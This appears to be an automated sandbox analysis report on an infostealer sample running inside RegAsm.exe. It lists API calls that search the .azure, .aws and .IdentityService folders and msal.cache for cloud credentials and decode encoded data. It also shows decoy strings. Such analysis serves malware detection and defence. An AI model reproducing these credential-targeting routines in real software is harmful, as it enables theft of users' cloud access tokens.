                                                                                                                                                                                                                                                                                                  • The Near-Earth Object Confirmation Page (NEOCP) is a web service listing recently-submitted observations of objects that may be near-Earth objects (NEOs)., xrefs: 00402392
                                                                                                                                                                                                                                                                                                  • Nuestra Belleza Nuevo Le?n 2004, was held at Las Lomas Eventos in Monterrey, Nuevo Le?n on July 6, 2004. , xrefs: 004023FF
                                                                                                                                                                                                                                                                                                  • At the conclusion of the final night of competition Ana Paola De la Parra of San Pedro Garza Garc?a was crowned the winner. De la Parra was crowned by outgoing Nuestra Belleza Nuevo Le?n titleholder Alejandra Villanueva., xrefs: 00402409
                                                                                                                                                                                                                                                                                                  • At the conclusion of the final night of competition Ana Paola De la Parra of San Pedro Garza Garc?a was crowned the winner. De la Parra was crowned by outgoing Nuestra Belleza Nuevo Le?n titleholder Alejandra Villanueva., xrefs: 004023A6
                                                                                                                                                                                                                                                                                                  • Nuestra Belleza Nuevo Le?n 2004, was held at Las Lomas Eventos in Monterrey, Nuevo Le?n on July 6, 2004. , xrefs: 004023C3
                                                                                                                                                                                                                                                                                                  • Nuestra Belleza Nuevo Le?n 2004, was held at Las Lomas Eventos in Monterrey, Nuevo Le?n on July 6, 2004. , xrefs: 0040239C
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: strlen$AllocLocal
                                                                                                                                                                                                                                                                                                  • String ID: At the conclusion of the final night of competition Ana Paola De la Parra of San Pedro Garza Garc?a was crowned the winner. De la Parra was crowned by outgoing Nuestra Belleza Nuevo Le?n titleholder Alejandra Villanueva.$At the conclusion of the final night of competition Ana Paola De la Parra of San Pedro Garza Garc?a was crowned the winner. De la Parra was crowned by outgoing Nuestra Belleza Nuevo Le?n titleholder Alejandra Villanueva.$At the conclusion of the final night of competition Ana Paola De la Parra of San Pedro Garza Garc?a was crowned the winner. De la Parra was crowned by outgoing Nuestra Belleza Nuevo Le?n titleholder Alejandra Villanueva.$At the conclusion of the final night of competition Ana Paola De la Parra of San Pedro Garza Garc?a was crowned the winner. De la Parra was crowned by outgoing Nuestra Belleza Nuevo Le?n titleholder Alejandra Villanueva.$Nuestra Belleza Nuevo Le?n 2004, was held at Las Lomas Eventos in Monterrey, Nuevo Le?n on July 6, 2004. $Nuestra Belleza Nuevo Le?n 2004, was held at Las Lomas Eventos in Monterrey, Nuevo Le?n on July 6, 2004. $Nuestra Belleza Nuevo Le?n 2004, was held at Las Lomas Eventos in Monterrey, Nuevo Le?n on July 6, 2004. $Nuestra Belleza Nuevo Le?n 2004, was held at Las Lomas Eventos in Monterrey, Nuevo Le?n on July 6, 2004. $The Near-Earth Object Confirmation Page (NEOCP) is a web service listing recently-submitted observations of objects that may be near-Earth objects (NEOs).
                                                                                                                                                                                                                                                                                                  • API String ID: 710835760-1224611842
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00417A41
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411670: SHGetFolderPathA.SHELL32(00000000,.kB,00000000,00000000,?,00000000), ref: 004116A8
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,00000000), ref: 00417A67
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,\.azure\), ref: 00417A84
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00417550: wsprintfA.USER32 ref: 00417588
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00417550: FindFirstFileA.KERNEL32(?,?), ref: 0041759F
                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00417AC3
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,00000000), ref: 00417AEC
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,\.aws\), ref: 00417B09
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00417550: StrCmpCA.SHLWAPI(?,004276D4), ref: 004175DC
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00417550: StrCmpCA.SHLWAPI(?,004276D8), ref: 004175F6
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00417550: wsprintfA.USER32 ref: 0041761B
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00417550: StrCmpCA.SHLWAPI(?,0042734E), ref: 0041762A
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00417550: wsprintfA.USER32 ref: 00417647
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00417550: PathMatchSpecA.SHLWAPI(?,?), ref: 00417677
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00417550: lstrcat.KERNEL32(?,0156F8D8), ref: 004176A3
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00417550: lstrcat.KERNEL32(?,004276F0), ref: 004176B5
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00417550: lstrcat.KERNEL32(?,?), ref: 004176C3
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00417550: lstrcat.KERNEL32(?,004276F4), ref: 004176D5
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00417550: lstrcat.KERNEL32(?,?), ref: 004176E9
                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00417B48
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,00000000), ref: 00417B71
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00417B8E
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00417550: wsprintfA.USER32 ref: 00417666
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00417550: FindNextFileA.KERNEL32(000000FF,?), ref: 004177B7
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00417550: FindClose.KERNEL32(000000FF), ref: 004177C9
                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00417BCD
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrcat$memsetwsprintf$Find$FilePath$CloseFirstFolderMatchNextSpec
                                                                                                                                                                                                                                                                                                  • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                                                                                                                                                                                                                                                                                  • API String ID: 515946987-974132213
                                                                                                                                                                                                                                                                                                  • Opcode ID: 94d49bf5eed57990bb565d728c9404399d6025bb18d034b4574d35f7f8a62bdb
                                                                                                                                                                                                                                                                                                  • Instruction ID: f1cab759c64a51ab36b00e3123f44d1aff27cf748a20ffaddcf602daf8714b48
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 94d49bf5eed57990bb565d728c9404399d6025bb18d034b4574d35f7f8a62bdb
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4851E9B1D00218BBCB14EBA0DC46FED7B79AB1D704F40465EF61563182EBBC67448BA5
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C805E9D
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C815B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C8156EE,?,00000001), ref: 6C815B85
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C815B50: EnterCriticalSection.KERNEL32(6C87F688,?,?,?,6C8156EE,?,00000001), ref: 6C815B90
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C815B50: LeaveCriticalSection.KERNEL32(6C87F688,?,?,?,6C8156EE,?,00000001), ref: 6C815BD8
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C815B50: GetTickCount64.KERNEL32 ref: 6C815BE4
                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C805EAB
                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C805EB8
                                                                                                                                                                                                                                                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(GeckoMain,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C805ECF
                                                                                                                                                                                                                                                                                                  • memcpy.VCRUNTIME140(00000000,GeckoMain,00000000), ref: 6C806017
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C7F4310: moz_xmalloc.MOZGLUE(00000010,?,6C7F42D2), ref: 6C7F436A
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C7F4310: memcpy.VCRUNTIME140(00000023,?,?,?,?,6C7F42D2), ref: 6C7F4387
                                                                                                                                                                                                                                                                                                  • moz_xmalloc.MOZGLUE(00000004), ref: 6C805F47
                                                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 6C805F53
                                                                                                                                                                                                                                                                                                  • GetCurrentThread.KERNEL32 ref: 6C805F5C
                                                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 6C805F66
                                                                                                                                                                                                                                                                                                  • DuplicateHandle.KERNEL32(00000000,?,?,?,0000004A,00000000,00000000), ref: 6C805F7E
                                                                                                                                                                                                                                                                                                  • moz_xmalloc.MOZGLUE(00000024), ref: 6C805F27
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C80CA10: mozalloc_abort.MOZGLUE(?), ref: 6C80CAA2
                                                                                                                                                                                                                                                                                                  • moz_xmalloc.MOZGLUE(00000040,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C8055E1), ref: 6C805E8C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C80CA10: malloc.MOZGLUE(?), ref: 6C80CA26
                                                                                                                                                                                                                                                                                                  • moz_xmalloc.MOZGLUE(00000050,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C8055E1), ref: 6C80605D
                                                                                                                                                                                                                                                                                                  • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C8055E1), ref: 6C8060CC
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Currentmoz_xmalloc$Thread$CriticalProcessSectionmemcpy$Count64CounterDuplicateEnterHandleLeaveNow@PerformanceQueryStamp@mozilla@@TickTimeV12@_freemallocmozalloc_abortstrlen
                                                                                                                                                                                                                                                                                                  • String ID: GeckoMain
                                                                                                                                                                                                                                                                                                  • API String ID: 3711609982-966795396
                                                                                                                                                                                                                                                                                                  • Opcode ID: c2fd6505037faa73201c4654c0c91e4d2e2872ccf7ee4dfa13fecf8ca247f4f2
                                                                                                                                                                                                                                                                                                  • Instruction ID: 89140e8e7d9b0753c580c55ffcf74b317103bebfc70ad52cd080242a0bcc2c22
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c2fd6505037faa73201c4654c0c91e4d2e2872ccf7ee4dfa13fecf8ca247f4f2
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5E71C4B06047409FD721DF29C58466ABBF0BF55308F444D7DE88687B52E730E988CBA2
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,block,00000000,?,00417F3E), ref: 004127D8
                                                                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 004127E3
                                                                                                                                                                                                                                                                                                  • strtok_s.MSVCRT ref: 004127FA
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ExitProcessstrtok_s
                                                                                                                                                                                                                                                                                                  • String ID: block
                                                                                                                                                                                                                                                                                                  • API String ID: 3407564107-2199623458
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 004137C3
                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 004137D5
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411670: SHGetFolderPathA.SHELL32(00000000,.kB,00000000,00000000,?,00000000), ref: 004116A8
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,00000000), ref: 00413801
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,01572220), ref: 00413820
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 00413834
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,01571F50), ref: 00413848
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411610: GetFileAttributesA.KERNEL32(00000000,00000000,00000000,00421AB8,000000FF,?,0040E72A,?,00000000,00000000,00000000,?,?), ref: 00411637
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040CDE0: StrStrA.SHLWAPI(00000000,01571F98,?,?,?,?,?,?,?,?,?,?,?,00421750,?), ref: 0040CE4B
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040CDE0: memcmp.MSVCRT ref: 0040CE89
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00406E80: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,00000002,?,0040C95D,?,00000000,?,00000000), ref: 00406EB7
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00406E80: GetFileSizeEx.KERNEL32(00000000,?,?,00000002,?,0040C95D,?,00000000,?,00000000,?,00000000), ref: 00406ECD
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00406E80: LocalAlloc.KERNEL32(00000040,?,00000000,?,00000002,?,0040C95D,?,00000000,?,00000000,?,00000000), ref: 00406EE8
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00406E80: ReadFile.KERNEL32(00000000,00000000,?,00000002,00000000,?,00000002,?,0040C95D,?,00000000,?,00000000,?,00000000), ref: 00406F01
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00406E80: CloseHandle.KERNEL32(00000000,?,00000002,?,0040C95D,?,00000000,?,00000000,?,00000000), ref: 00406F29
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411930: GlobalAlloc.KERNEL32(00000000,004138D9,?,?,?,004138D9,?,?), ref: 0041193B
                                                                                                                                                                                                                                                                                                  • StrStrA.SHLWAPI(00000000,01572460), ref: 004138E5
                                                                                                                                                                                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 004139BA
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00406F50: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,004064DB,00000000,00000000), ref: 00406F77
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00406F50: LocalAlloc.KERNEL32(00000040,00000000,?,004064DB,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406F86
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00406F50: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,004064DB,00000000,00000000), ref: 00406F9D
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00406F50: LocalFree.KERNEL32(?,?,004064DB,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406FAC
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00407110: memcmp.MSVCRT ref: 0040714B
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00407110: memset.MSVCRT ref: 00407179
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00407110: LocalAlloc.KERNEL32(00000040,?), ref: 004071B0
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,00000000), ref: 0041395E
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,0042734D,?,?,?,?,000003E8), ref: 0041397B
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 00413996
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,004276B0), ref: 004139A2
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrcat$AllocFileLocal$memset$BinaryCryptFreeGlobalStringmemcmp$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                                                                                                                                                                                                                                                                                  • String ID: PrA$PrA
                                                                                                                                                                                                                                                                                                  • API String ID: 4228189460-3271464785
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C7F31C0: LoadLibraryW.KERNEL32(KernelBase.dll), ref: 6C7F3217
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C7F31C0: GetProcAddress.KERNEL32(00000000,QueryInterruptTime), ref: 6C7F3236
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C7F31C0: FreeLibrary.KERNEL32 ref: 6C7F324B
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C7F31C0: __Init_thread_footer.LIBCMT ref: 6C7F3260
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C7F31C0: ?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(?), ref: 6C7F327F
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C7F31C0: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C7F328E
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C7F31C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C7F32AB
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C7F31C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C7F32D1
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C7F31C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C7F32E5
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C7F31C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6C7F32F7
                                                                                                                                                                                                                                                                                                  • LoadLibraryW.KERNEL32(Api-ms-win-core-memory-l1-1-5.dll), ref: 6C809675
                                                                                                                                                                                                                                                                                                  • __Init_thread_footer.LIBCMT ref: 6C809697
                                                                                                                                                                                                                                                                                                  • LoadLibraryW.KERNEL32(ntdll.dll), ref: 6C8096E8
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 6C809707
                                                                                                                                                                                                                                                                                                  • __Init_thread_footer.LIBCMT ref: 6C80971F
                                                                                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C809773
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,MapViewOfFileNuma2), ref: 6C8097B7
                                                                                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32 ref: 6C8097D0
                                                                                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32 ref: 6C8097EB
                                                                                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C809824
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: LibraryTime$StampV01@@Value@mozilla@@$AddressFreeInit_thread_footerLoadProc$ErrorLastStamp@mozilla@@$Creation@Now@ProcessV12@V12@_
                                                                                                                                                                                                                                                                                                  • String ID: Api-ms-win-core-memory-l1-1-5.dll$MapViewOfFileNuma2$NtMapViewOfSection$ntdll.dll
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • InitializeCriticalSection.KERNEL32(6C87F618), ref: 6C856694
                                                                                                                                                                                                                                                                                                  • GetThreadId.KERNEL32(?), ref: 6C8566B1
                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C8566B9
                                                                                                                                                                                                                                                                                                  • memset.VCRUNTIME140(?,00000000,00000100), ref: 6C8566E1
                                                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(6C87F618), ref: 6C856734
                                                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 6C85673A
                                                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(6C87F618), ref: 6C85676C
                                                                                                                                                                                                                                                                                                  • GetCurrentThread.KERNEL32 ref: 6C8567FC
                                                                                                                                                                                                                                                                                                  • memset.VCRUNTIME140(?,00000000,000002C8), ref: 6C856868
                                                                                                                                                                                                                                                                                                  • RtlCaptureContext.NTDLL ref: 6C85687F
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CriticalCurrentSectionThread$memset$CaptureContextEnterInitializeLeaveProcess
                                                                                                                                                                                                                                                                                                  • String ID: WalkStack64
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C839420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C804A68), ref: 6C83945E
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C839420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C839470
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C839420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C839482
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C839420: __Init_thread_footer.LIBCMT ref: 6C83949F
                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C83DE73
                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C83DF7D
                                                                                                                                                                                                                                                                                                  • AcquireSRWLockExclusive.KERNEL32(6C87F4B8), ref: 6C83DF8A
                                                                                                                                                                                                                                                                                                  • ReleaseSRWLockExclusive.KERNEL32(6C87F4B8), ref: 6C83DFC9
                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C83DFF7
                                                                                                                                                                                                                                                                                                  • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C83E000
                                                                                                                                                                                                                                                                                                  • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,6C804A68), ref: 6C83DE7B
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C8394D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C8394EE
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C8394D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C839508
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C82CBE8: GetCurrentProcess.KERNEL32(?,6C7F31A7), ref: 6C82CBF1
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C82CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C7F31A7), ref: 6C82CBFA
                                                                                                                                                                                                                                                                                                  • ?RegisterProfilerLabelEnterExit@mozilla@@YAXP6APAXPBD0PAX@ZP6AX1@Z@Z.MOZGLUE(00000000,00000000,?,?,?,6C804A68), ref: 6C83DEB8
